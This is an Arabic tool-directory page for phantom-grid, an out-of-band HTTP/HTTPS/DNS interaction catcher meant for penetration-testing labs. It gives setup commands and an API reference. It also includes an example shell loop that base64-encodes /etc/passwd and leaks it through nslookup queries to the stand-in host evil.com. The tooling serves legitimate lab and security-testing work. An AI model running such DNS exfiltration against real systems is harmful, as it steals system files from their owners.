Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
phantom-grid — بديل مجاني لـ Burp Collaborator - التقاط التفاعلات خارج النطاق (HTTP/HTTPS/DNS) مع SQLite وإعادة تجميع البيانات المستخرجة | Kitploit
أدوات/GitHubGitHub/evkir/phantom-grid
توليد الحمولةتحليل الثغرات الأمنيةاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتأمن الويباختبار الاختراقالأدوات والمكوناتالفريق الأحمرتحليل DNS
GitHub
112منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
evkir/phantom-grid

phantom-grid

بديل مجاني لـ Burp Collaborator - التقاط التفاعلات خارج النطاق (HTTP/HTTPS/DNS) مع SQLite وإعادة تجميع البيانات المستخرجة

عرض المستودعالموقع الإلكتروني
مشاركة

Phantom Grid

⬡ Phantom Grid

بديل مجاني ومفتوح المصدر لـ Burp Collaborator لمعامل اختبار الاختراق
التقاط التفاعلات خارج النطاق (OOB) · HTTP/HTTPS · DNS · SQLite · إعادة تجميع تسريب البيانات


ما هذا؟

Phantom Grid هي أداة استضافة ذاتية لالتقاط التفاعلات خارج النطاق (OOB) — بديل مجاني لـ Burp Collaborator لحل معامل اختبار الاختراق (PortSwigger Web Security Academy، HackTheBox، TryHackMe، إلخ).

ميزات الإصدار 2.0

الميزةالوصف
التقاط HTTP + HTTPSمزدوج المكدس مع شهادات TLS ذاتية التوقيع تُنشأ تلقائيًا
التقاط DNSخادم DNS مدمج على المنفذ 53
إعادة تجميع تسريب DNSإعادة تجميع تلقائية للأجزاء من تسريب DNS متعدد الأجزاء
استمرارية SQLiteجميع البيانات تبقى بعد إعادة تشغيل الخادم (وضع WAL للأداء)
أكثر من 40 قالب حمولةSSRF، XXE، SQLi OOB، CMDi، SSTI، تسريب DNS — جاهزة للنسخ
لوحة تحكم تكتيكيةواجهة مركز قيادة مع مراقبة في الوقت الفعلي
جاهز لـ Dockerنشر بأمر واحد
REST APIواجهة برمجة كاملة لإدارة الرموز/التفاعلات/التسريب

البدء السريع

الخيار 1: Python

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
pip install -r server/requirements.txt

# HTTP only
python server/server.py

# HTTP + HTTPS (auto-generates self-signed cert)
python server/server.py --https

# Full stack (requires sudo for DNS port 53)
sudo python server/server.py --https --dns

الخيار 2: Docker

git clone https://github.com/YOUR_USERNAME/phantom-grid.git
cd phantom-grid
docker compose up -d

الخيار 3: ngrok (للمعامل بدون VPS)

python server/server.py --https &
ngrok http 9090
# Use the ngrok HTTPS URL in your payloads

البنية المعمارية

┌──────────────────────────────────────────────────────────────┐
│                      PHANTOM GRID v2.0                        │
│                                                               │
│  ┌─────────────┐      ┌─────────────────────────────────┐   │
│  │  Dashboard   │─API─▶│  Flask Server                   │   │
│  │  (React)     │      │                                 │   │
│  └─────────────┘      │  :9090  HTTP  capture + API     │   │
│                         │  :9443  HTTPS capture + API     │   │
│  ┌─────────────┐      │  :53    DNS   capture            │   │
│  │ Target App   │─────▶│                                 │   │
│  └─────────────┘      └──────────┬──────────────────────┘   │
│                                    │                          │
│                         ┌──────────▼──────────┐              │
│                         │   SQLite Database    │              │
│                         │   phantom_grid.db    │              │
│                         │                      │              │
│                         │  tokens              │              │
│                         │  interactions         │              │
│                         │  dns_exfil_sessions  │              │
│                         │  dns_exfil_chunks    │              │
│                         └─────────────────────┘              │
│                                                               │
└──────────────────────────────────────────────────────────────┘

دعم HTTPS

غالبًا ما تحظر التطبيقات الحديثة طلبات المحتوى المختلط (http:// من صفحات https://). يشغّل Phantom Grid v2.0 بروتوكول HTTPS إلى جانب HTTP.

شهادة ذاتية التوقيع تُنشأ تلقائيًا

python server/server.py --https
# Generates certs/server.pem + certs/server.key automatically
# HTTPS available at https://0.0.0.0:9443

شهادة مخصصة (Let's Encrypt، إلخ)

python server/server.py --https \
  --cert /etc/letsencrypt/live/yourdomain/fullchain.pem \
  --key /etc/letsencrypt/live/yourdomain/privkey.pem

مع ngrok (HTTPS عام فوري)

python server/server.py &
ngrok http 9090
# ngrok provides a trusted HTTPS URL automatically

إعادة تجميع تسريب DNS

يعيد Phantom Grid تجميع بيانات تسريب DNS المجزأة تلقائيًا. هذا أمر بالغ الأهمية لاستخراج الحمولات الكبيرة التي يجب تقسيمها عبر عمليات بحث DNS متعددة (التسميات محدودة بـ 63 بايت).

الصيغ المدعومة

الصيغةالمثالحالة الاستخدام
بسيطةdata.TOKEN.domainتسريب قيمة واحدة
مفهرسة0.chunk1.TOKEN.domainجلسة تلقائية، أجزاء مرتبة
موسومةsess1.0.chunk1.TOKEN.domainجلسة مسماة مع ترتيب
إشارة النهايةend.sess1.TOKEN.domainوضع علامة اكتمال الجلسة

مثال: تسريب /etc/passwd عبر DNS

على الهدف:

# Split file into 50-byte base64 chunks and send via DNS
data=$(base64 /etc/passwd | tr -d '\n')
token="a1b2c3d4e5f6"
domain="evil.com"
i=0
while [ -n "$data" ]; do
  chunk=$(echo "$data" | cut -c1-50)
  data=$(echo "$data" | cut -c51-)
  nslookup "exfil.$i.$chunk.$token.$domain" >/dev/null 2>&1
  i=$((i+1))
done
nslookup "end.exfil.$token.$domain" >/dev/null 2>&1

عرض البيانات المعاد تجميعها:

curl http://localhost:9090/api/tokens/a1b2c3d4e5f6/exfil

الاستجابة:

[{
  "session_tag": "exfil",
  "completed": 1,
  "chunk_count": 12,
  "reassembled": "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYm..."
}]

استمرارية SQLite

تُخزَّن جميع البيانات في phantom_grid.db باستخدام وضع SQLite WAL لأداء القراءة/الكتابة المتزامنة.

phantom_grid.db
├── tokens                 — Token metadata
├── interactions            — All HTTP/DNS captures
├── dns_exfil_sessions     — Grouped exfil sessions
└── dns_exfil_chunks       — Individual exfil data chunks

تبقى البيانات بعد إعادة تشغيل الخادم. احتفظ بنسخة احتياطية عن طريق نسخ phantom_grid.db.


مرجع API

الرموز

الطريقةنقطة النهايةالوصف
GET/api/tokensعرض جميع الرموز مع الإحصائيات
POST/api/tokensإنشاء رمز {"label": "...", "notes": "..."}
PATCH/api/tokens/<id>تحديث تسمية/ملاحظات الرمز
DELETE/api/tokens/<id>حذف الرمز + جميع البيانات (CASCADE)

التفاعلات

الطريقةنقطة النهايةالوصف
GET/api/tokens/<id>/interactions?limit=&offset=الحصول على تفاعلات الرمز
DELETE/api/tokens/<id>/interactionsمسح التفاعلات
GET/api/log?limit=السجل العام (جميع الرموز)
GET/api/poll?since=<ISO>استقصاء التفاعلات الجديدة

تسريب DNS

الطريقةنقطة النهايةالوصف
GET/api/tokens/<id>/exfilالحصول على جلسات التسريب مع البيانات المعاد تجميعها

النظام

الطريقةنقطة النهايةالوصف
GET/api/statsالإحصائيات العامة (الأعداد، حجم قاعدة البيانات)
GET/healthفحص الحالة

نقاط نهاية الالتقاط

البروتوكولنقطة النهاية
HTTPhttp://server:9090/c/<TOKEN>
HTTPShttps://server:9443/c/<TOKEN>
DNS<TOKEN>.yourdomain.com
تسريب DNS<data>.<TOKEN>.yourdomain.com

خيارات CLI

python server.py [OPTIONS]
تنزيل الأداة